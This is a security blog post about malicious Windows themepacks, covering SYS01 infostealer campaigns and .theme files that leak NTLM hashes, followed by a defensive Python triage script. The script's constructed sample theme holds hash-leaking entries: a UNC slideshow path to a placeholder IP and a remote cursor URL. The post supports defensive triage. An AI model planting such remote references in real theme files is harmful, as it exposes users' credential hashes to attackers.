
For many people, the ability to customise their computer workspace is a wonderful thing – the ability to change colour schemes, sounds, wallpapers, etc. is something that allows them to express their own personality and individuality through their device.
Windows users have long had the ability to alter these items – I remember spending hours tweaking the settings in Windows 95 to have Simpsons-themed sounds and mouse pointers, or playing around with multiple different screensaver files. Even today, I have a folder of 10,000+ desktop images which I randomise to display on my multi-monitor setup – at the moment, all my monitors show a series of images depicting characters from Neil Gaiman’s “The Sandman”, my favourite graphic novels of all time.

Windows 11 allows users to customise their setup either by manually changing backgrounds, colours and sounds, etc., or by selecting one of the hundreds of pre-made themes.

Selecting one of the themes allows a user to download a file known as a themepack – this is a special Windows file that contains a number of instructions used to customise the user’s workspace.
The themepack will typically contain items such as image files and icons, but will also contain a .theme file, which holds the instructions that allow Windows to change the system settings that produce the updated look.
To install a downloaded themepack, simply double-click the file and Windows will do all the necessary work to change your settings. Alternatively, you can access themes via Windows Settings.

Themepacks are essentially special archive files, which can be examined by changing the extension from .themepack to .zip.


Once the file has been renamed, it can be examined with any of the common archive utilities such as WinRAR or 7-Zip.

In this example, the themepack file contains a single folder of images and the .theme file.
The images folder holds a number of .jpg files of playful dogs which will be used as the desktop images, whilst the .theme file holds the instructions on what to amend in the Windows settings, and ultimately the Windows registry.


Danger ahead!
Whilst themes downloaded via the official Microsoft Store are perfectly safe, themepack files downloaded from other sources may not be.
Recent malware-spreading campaigns have targeted social media platforms such as Facebook and X to push various malware, such as infostealers, under the guise of themepacks.


When users click these tempting adverts, they are redirected to websites which, in some cases, host auto-downloading zip files containing the malware.


In many cases, these zip files contain self-extracting .dll files, PowerShell scripts and other executables which install the malware and create persistence mechanisms to ensure the malware stays on the victim system for as long as possible.
One of the common malware files installed is called SYS01 – this is an info-stealer designed to grab as much data from a victim machine as possible. Most of the data targeted by SYS01 is browser data, such as session cookies, stored passwords and browsing history. The malware also seeks out cryptocurrency wallets on the victim machine.
The malware also heavily targets a user’s Facebook data and attempts to steal information relating to the user’s profile (name, location, date of birth, etc.) as well as any pages the user may administer, including the number of followers or subscribers – this helps to push the malware to even more people by ensuring those followers see the malware-spreading adverts.
Malicious theme files
In other attacks, the attackers generate otherwise legitimate .theme files which contain links to external files; when these are accessed, the victim machine is forced to attempt to authenticate with its Windows credentials, in an attack known as a pass-the-hash attack.

In the example shown above – when the victim executes the themepack, Windows will attempt to connect to the externally shared URL to retrieve the image. In doing so, it will send its NTLM password hash and login user name.
Criminals can collect these hashes and attempt to crack the passwords they contain, or in some cases simply pass them on to services in an attempt to hijack a user’s session.
Because Microsoft is moving away from users logging on with local Windows accounts and towards Microsoft online accounts, attackers can use this approach to more readily access a range of remote services offered by Microsoft, such as email accounts, Azure services, Xbox accounts or corporate networks.
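The following script is an added example, not code from the original post, and brings together three things described above: renaming the themepack and listing what is inside, spotting files that have no business in a theme (the post names .dll files, PowerShell scripts and other executables), and reading the .theme file for settings that point at an external location, which is what causes the outbound NTLM authentication just described. It treats the container as a zip archive, following the post’s rename-to-.zip description, and the sample themepack it builds in memory is constructed for the demo: the section and key names ([Control Panel\Desktop] Wallpaper, [Slideshow] ImagesRootPath, [Control Panel\Cursors] Arrow) are assumed from typical .theme files, and the host names in it are documentation placeholders rather than real indicators.

```python
"""Defender-side triage of a downloaded themepack (added example; assumptions noted inline)."""
import configparser
import io
import re
import zipfile
from pathlib import PurePosixPath
from typing import Dict, List, Tuple

# File types a benign themepack is expected to carry: the .theme file plus
# images, icons and cursors. Anything else is reported as unexpected.
EXPECTED_SUFFIXES = {".theme", ".jpg", ".jpeg", ".png", ".bmp", ".ico", ".cur", ".ani"}

# A value starting with a UNC path (\\host\share\...) or a URL scheme makes
# Windows contact a remote host when the theme is applied; a UNC target is the
# trigger for the outbound NTLM authentication the post describes.
REMOTE_REF = re.compile(r"^(\\\\[^\\]+\\|[a-z][a-z0-9+.-]*://)", re.IGNORECASE)

# Constructed sample .theme (not a real theme). Section/key names are assumed
# from typical .theme files; two entries deliberately point off-machine.
SAMPLE_THEME = r"""
; constructed sample for this example
[Theme]
DisplayName=Playful Dogs

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\Resources\Themes\Dogs\dog1.jpg
TileWallpaper=0
WallpaperStyle=10

[Slideshow]
Interval=1800000
Shuffle=1
ImagesRootPath=\\203.0.113.10\share\dogs

[Control Panel\Cursors]
Arrow=http://example.invalid/cursors/arrow.cur

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
"""


def decode_theme(raw: bytes) -> str:
    """.theme files are plain INI text; Windows often saves them as UTF-16 with a BOM."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig", errors="replace")


def find_remote_references(theme_text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for every setting that points off the local machine."""
    # interpolation=None: values such as %SystemRoot% must not be treated as format strings.
    parser = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    parser.optionxform = str  # keep key names as written instead of lower-casing them
    parser.read_string(theme_text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if value and REMOTE_REF.match(value.strip()):
                hits.append((section, key, value.strip()))
    return hits


def triage_themepack(archive_bytes: bytes) -> Dict[str, list]:
    """List the container's members, flag unexpected file types and scan any .theme file."""
    report = {"members": [], "unexpected_members": [], "remote_references": []}
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            report["members"].append(name)
            suffix = PurePosixPath(name).suffix.lower()
            if suffix not in EXPECTED_SUFFIXES:
                report["unexpected_members"].append(name)
            if suffix == ".theme":
                report["remote_references"].extend(find_remote_references(decode_theme(zf.read(name))))
    return report


def triage_file(path: str) -> Dict[str, list]:
    """Convenience wrapper for a themepack already renamed to .zip on disk."""
    with open(path, "rb") as fh:
        return triage_themepack(fh.read())


def build_sample_themepack() -> bytes:
    """Construct an in-memory archive mirroring the post's layout, plus one dropped script."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("DesktopBackground/dog1.jpg", b"\xff\xd8\xff")  # stub JPEG header, constructed
        zf.writestr("DesktopBackground/dog2.jpg", b"\xff\xd8\xff")
        zf.writestr("Dogs.theme", SAMPLE_THEME)
        zf.writestr("update.ps1", "# constructed stand-in for a dropped script\n")
    return buf.getvalue()


if __name__ == "__main__":
    result = triage_themepack(build_sample_themepack())
    for member in result["members"]:
        flag = "  <-- unexpected" if member in result["unexpected_members"] else ""
        print(member + flag)
    for section, key, value in result["remote_references"]:
        print(f"remote reference: [{section}] {key}={value}")
```

Run against the constructed sample, the script reports update.ps1 as an unexpected member and two remote references (the UNC slideshow root and the HTTP cursor); a clean themepack like the dogs example in the post produces an empty list for both. Any hit in remote_references is a reason not to apply the theme, since a UNC path is exactly what makes Windows send outbound NTLM authentication to a host the attacker controls.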
Stay safe
In the corporate environment, the installation of themes can be blocked with Group Policy, as can outbound NTLM authentication sessions, but home users typically don’t have these luxuries.
So, as with most things – always check the legitimacy of the places you download from. Where possible, only download files from trusted sources, such as the App Store / Microsoft Store, and try to avoid following links from social media.
If you do download from external sites, then ensure your device is fully up to date with security updates, patches, etc., and always use an anti-virus product. Criminals will try anything to trick a victim into installing their malicious files.